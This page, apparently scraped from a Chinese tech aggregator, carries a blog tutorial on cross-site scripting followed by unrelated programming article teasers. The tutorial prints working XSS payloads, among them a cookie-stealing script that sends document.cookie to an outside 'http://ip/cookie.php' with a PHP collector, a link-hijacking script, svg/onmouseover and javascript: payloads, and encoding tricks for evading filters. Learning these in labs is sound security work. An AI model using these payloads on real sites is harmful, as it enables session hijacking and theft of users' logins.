当前位置：首页 > news >正文

WEB系列(二)-----------XSS

news 2025/11/9 6:46:23

XSS原理及基础

定义

恶意攻击者会往Web页面里插入JS代码,当用户点击网页时.镶嵌的JS代码就会执行,从而达到恶意的特殊目的.

原因

程序对输入和输出的控制不够严格，导致payload输出到前段时被浏览器当做有效代码执行从而产生危害。

测试流程

目标站点找到输入点，
输入一组特殊字符+唯一识别字符，点击提交后，查看源码。先看看网页对特殊字符做了哪些过滤。
通过搜索定位到唯一的字符，确认是否可以构造js的条件
提交构造的脚本代码，看是否可以成功执行
tips
查询接口容易出现反射型XSS，留言板容易出现存储型XSS
绕过过滤机制

存储型XSS原理

攻击者在页面上插入XSS代码,服务端将数据存入数据库当用户访问到存在XSS漏洞的页面时,服务端从数据库中取出数据展示到页面上,导致XSS代码执行,达到攻击效果.

可能存在的位置:一切用户可以输入的位置

XSS盗取cookie

Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式.Cookie是由Web服务器保存在用户浏览器上的小文本文件.他可以包含有关用户信息.

存在反射型XSS漏洞的位置,可以利用以下链接来盗取Cookie(dvwa,xss low):

url?uname=<script>document.location='http://ip/cookie.php?cookie='+document.cookie</script>#cookie.php
<?php  
$cookie = $_GET['cookie'];
file_put_contents("cookie.txt", $cookie);
echo "ok";
?>

在这里插入图片描述劫持会话后可以进一步利用漏洞，修改配置文件

XSS篡改网页链接

篡改链接

<script>
window.onload=function(){
var link = document.getElementsByTagName("a");
for(j=0;j<link.length;j++){
link[j].herf="http://ip";
}
}
</script>apt-get install beef-xss

###XSS盗取用户信息
克隆网站登录页面，利用存储XSS设置跳转代码，如果用户访问即跳转到克隆网站的登录页面，用户输入登录，账号和密码被存储。

主要是用setookie，但是新版的Kali不能用。

探测XSS过程

构造一个不会被识别成恶意代码的字符串
查找该字符串的位置。
构造XSSpayload

属性中的XSS

xss事件
1.鼠标点击相应位置时，触发弹框。

onmouseover=alert(document.domain)>

选择列表的XSS

隐性参数XSS

SVG介绍

SVG意为可缩放矢量图形，使用XML格式定义图像。
可以通过,,,svg标签插入HTML文档。

<svg onload=····>

在这里插入图片描述注入点在一个被隐藏的位置，burp抓包后。

"><svg /onload=alert(document.domain)>%0a

HTML事件

onlink:当鼠标点击时运行脚本。
ondblclick:当双击鼠标运行脚本
ondrag:当拖动元素时运行脚本
ondragend:当拖动操作结束时运行脚本
ondragenter:当元素被拖动至有效的拖放目标时运行脚本
ondragleave:当元素离开有效拖放目标时运行脚本
ondragover:当元素被拖放至有效目标上方时运行
ondragstart:当拖动操作开始时运行脚本
ondrop:当拖动元素正在被拖放时运行脚本
onmousedown
onmousemove
onmouseout
onmouseover
onmouseup
onmousewheel:当鼠标滚轮时运转
onscroll

空格可以引发属性
在这里插入图片描述 ## JavaScript伪协议
javascript:js代码

javascript:alert('hello')

在这里插入图片描述伪协议XSS

"><a herf="javascript:alert(document.domain)">xss</a>r经过·html编码
"><a href="java&#115;cript:alert(document.domain)">1</a>

在IE中``可以闭合一个双引号，双写绕过，html编码绕过，unicode编码绕过。

htmlspecialchars()：把预定义的字符转换为HTML实体。```&,<,>,',"`````
strip_tags():剥去字符串中HTML,PHP,XML的标签，并不是转换。
htmlentities()可以处理用户输入防止XSS
JS编码：数字形式\u后面加4位16进制数字或\x2位16进制数字
HTML编码：实体编码一般以"&“开头”;“结尾，进制编码通常以”&#“开头加上字符的数值,”;"结尾,字符的数值可以是任意十进制ascii码或者unicode字符编码,十六进制需要在编码前加’x’.@
进制编码:十进制编码,String.fromChareCode(97,86),十六进制编码(“\x87\x65”),unicode编码(“\u0012\u0045”).
url编码:%+十六进制
进行编码是为了绕过某些xss_filter

XSS绕过

https://owasp.org/www-community/xss-filter-evasion-cheatsheet

XSS发生的位置

GET：如果在URL中提交的参数中能够在页面中显示，就可能会有XSS。
POST
JSON
自定义http头中

XSS工具

xsser
xsstrike

WEB系列(二)-----------XSS

XSS原理及基础定义恶意攻击者会往Web页面里插入JS代码,当用户点击网页时.镶嵌的JS代码就会执行,从而达到恶意的特殊目的. 原因程序对输入和输出的控制不够严格，导致payload输出到前段时被浏览器当做有效代码执行从而产生危害。分类存储型反射型DOM型测…...

编程日记 2023/2/20 1:45:25

[python入门㊾] - python异常中的断言

目录 ❤ 断言的功能与语法 ❤ 常用断言 ❤ 常用的断言表达方式 ❤ 异常断言 ❤ 正则断言 ❤ 检查断言装饰器 ❤ 断言的功能与语法 Python assert（断言）用于判断一个表达式，在表达式条件为 False 的时候触发异常断言可以在条件…...

编程日记 2023/2/20 1:44:14

一文告诉你什么是财务数据治理？

大家好，我是梦想家Alex，今天是周末，就不给大家分享技术文了～应出版社老师推荐，文末给大家送几本DAMA中国主席力荐，20位行业专家历时2年共同打造的《财务数据治理实战》，将数据治理理论应用于财务…...

编程日记 2023/2/20 1:43:06

MySQL数据库调优————ORDER BY语句

ORDER BY调优的核心原理，原则是利用索引的有序性跳过排序环节关于ORDER BY语句的一些尝试我们使用employees表进行尝试，索引情况如下在执行计划的结果中，Extra里如果存在，Using filesort则表示，排序没有使用到索…...

编程日记 2023/2/20 1:41:56

Linux命令之grep

Linux grep是一个非常强大的文本搜索工具。按照给定的正则表达式对目标文本进行匹配检查，打印匹配到的行。grep命令可以跟其他命令一起使用，对其他命令的输出进行匹配。 grep语法如下： grep [options] [pattern] content 文本检索 grep可以对…...

编程日记 2023/2/20 1:39:44

一起学 pixijs（4）：如何绘制文字md

大家好，我是前端西瓜哥，今天我们来学 pixijs 如何绘制文字。pixijs 版本为 7.1.2。使用原生的 WebGL 来绘制文字是非常繁琐的，pixijs 对此进行了高层级的封装，提供了 Text 类和 BitMapText 类来绘制文字。 Text 最基本的写法&…...

编程日记 2023/2/20 1:38:35

mac m1设备上安装Qt并使用qt编程遇到的问题以及解决方式

# 简介： 首先在M1平台上的程序可以看到有两种架构，分别是intel的（x86-64）和苹果的m1（arm64架构），根据苹果的介绍，当在m1上面运行intel程序的时候使用的是转译的方式运行的&#xff…...

编程日记 2023/2/20 1:37:27

tensorflow 学习笔记（二）：神经网络的优化过程

前言： 学习跟随如何原谅奋力过但无声的 tensorflow 笔记笔记。本章主要讲解神经网络的优化过程：神经网络的优化方法，掌握学习率、激活函数、损失函数和正则化的使用，用 Python 语言写出 SGD、Momentum、Adagrad、RMSProp、Ada…...

编程日记 2023/2/20 1:36:18

【Java】《Java8 实战》 CompletableFuture 学习

文章目录前言1. 并发(Concurrent) 和并行(Parallel)1.1 并发的来源1.2 并发技术解决了什么问题2. 并行的来源2.1 并行解决了什么问题3. CompletableFuture 简介4. CompletableFuture 简单应用5. CompletableFuture 工厂方法的应用6. CompletableFuture join() 方法7. 使用 Par…...

编程日记 2023/2/20 1:35:08

Vue3之条件渲染

1.何为条件渲染条件渲染就是在指定的条件下，渲染出指定的UI。比如当我们显示主页的时候，应该隐藏掉登录等一系列不相干的UI元素。即UI元素只在特定条件下进行显示。而在VUE3中，这种UI元素的显示和隐藏可以通过两个关键字，v-if 和…...

编程日记 2023/2/20 1:34:00

将Nginx 核心知识点扒了个底朝天（四）

为什么 Nginx 不使用多线程？ Apache: 创建多个进程或线程，而每个进程或线程都会为其分配 cpu 和内存（线程要比进程小的多，所以 worker 支持比 perfork 高的并发），并发过大会榨干服务器资源。 Nginx: 采用…...

编程日记 2023/2/20 1:32:52

设计模式之工厂模式

文章の目录一、什么是工厂模式二、工厂模式有什么用？三、应用场景四、示例1、用字面量的方式创建对象2、使用工厂模式创建对象参考写在最后一、什么是工厂模式工厂模式是一种众所周知的设计模式，广泛应用于软件工程领域，用于抽象创建特定对…...

编程日记 2023/2/20 1:31:40

80.链表-由来

链表是怎么发展来的线性表：是n个具有相同特性的数据元素的有限序列。链表：具有线性存储结构的线性表。为什么需要使用链表？（链表是如何被设计出来的） 程序开发最重要的部分是如何在项目程序中找到一种合适的、好…...

编程日记 2023/2/20 1:30:33

元胞自动机

文章目录前言文献阅读摘要主要贡献方法框架实验结论元胞自动机元胞自动机是什么？构成及规则案例及代码实现总结前言 This week,the paper proposes a Multi-directional Temporal Convolutional Artificial Neural Network (MTCAN) model to impute and forecast P…...

编程日记 2023/2/20 1:29:25

设计模式之各种设计模式总结与对比

目录1 目标2 定位3 一句话归纳设计原则4 G0F 23种设计模式简介5 设计模式使用频次总结6 —句话归纳设计模式7 设计模式之间的关联关系和对比1 目标 1、简要分析GoF 23种设计模式和设计原则,做整体认知。 2、剖析Spirng的编程思想，启发思维,为之后深入学习Spring…...

编程日记 2023/2/20 1:28:17

JAVA练习55- Fizz Buzz

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档目录前言一、题目-Fizz Buzz 1.题目描述 2.思路与代码 2.1 思路 2.2 代码总结前言提示：这里可以添加本文要记录的大概内容： 2月19日练习…...

编程日记 2023/2/20 1:27:10

LeetCode笔记：Biweekly Contest 98

LeetCode笔记：Biweekly Contest 98 1. 题目一 1. 解题思路2. 代码实现 2. 题目二 1. 解题思路2. 代码实现 3. 题目三 1. 解题思路2. 代码实现 4. 题目四比赛链接：https://leetcode.com/contest/biweekly-contest-98 1. 题目一给出题目一的试题链接如…...

编程日记 2023/2/20 1:26:00

HNUCM-《算法分析与设计》期末考试考前复习题

问题 A: X星人的地盘题目描述一天，X星人和Y星人在一张矩形地图上玩抢地盘的游戏。X星人每抢到一块地，在地图对应的位置标记一个“X”；Y星人每抢到一块地，在地图对应的位置标记一个“Y”；如果某一块地无法确定其归属则标…...

编程日记 2023/2/20 1:24:53

算法导论【分治思想】—大数乘法、矩阵相乘、残缺棋盘

这里写自定义目录标题分治法概述特点大数相乘问题分治算法矩阵相乘分治算法残缺棋盘分治算法分治法概述在分而治之的方法中，一个问题被划分为较小的问题，然后较小的问题被独立地解决，最后较小问题的解决方案被组合成一个大问题的解决。通常…...

编程日记 2023/2/20 1:23:44

Java【七大排序】算法详细图解，一篇文章吃透

文章目录一、排序相关概念二、七大排序1，直接插入排序2，希尔排序3，选择排序4，堆排序5，冒泡排序5.1冒泡排序的优化6，快速排序6.1 快速排序的优化7，归并排序三、排序算法总体分析对比总结提示&…...

编程日记 2023/2/20 1:22:35

AtCoder 第409场初级竞赛 A~E题解

A Conflict 【题目链接】原题链接：A - Conflict 【考点】枚举【题目大意】找到是否有两人都想要的物品。【解析】遍历两端字符串，只有在同时为 o 时输出 Yes 并结束程序，否则输出 No。【难度】 GESP三级【代码参考】 #i…...

编程新知 2025/7/23 9:09:08

【决胜公务员考试】求职OMG——见面课测验1

2025最新版！！！6.8截至答题，大家注意呀！ 博主码字不易点个关注吧,祝期末顺利~~ 1.单选题(2分) 下列说法错误的是:（ B ） A.选调生属于公务员系统 B.公务员属于事业编 C.选调生有基层锻炼的要求 D…...

编程新知 2025/11/8 16:25:01

Chromium 136 编译指南 Windows篇：depot_tools 配置与源码获取（二）

引言工欲善其事，必先利其器。在完成了 Visual Studio 2022 和 Windows SDK 的安装后，我们即将接触到 Chromium 开发生态中最核心的工具——depot_tools。这个由 Google 精心打造的工具集，就像是连接开发者与 Chromium 庞大代码库的智能桥梁…...

编程新知 2025/11/9 3:52:47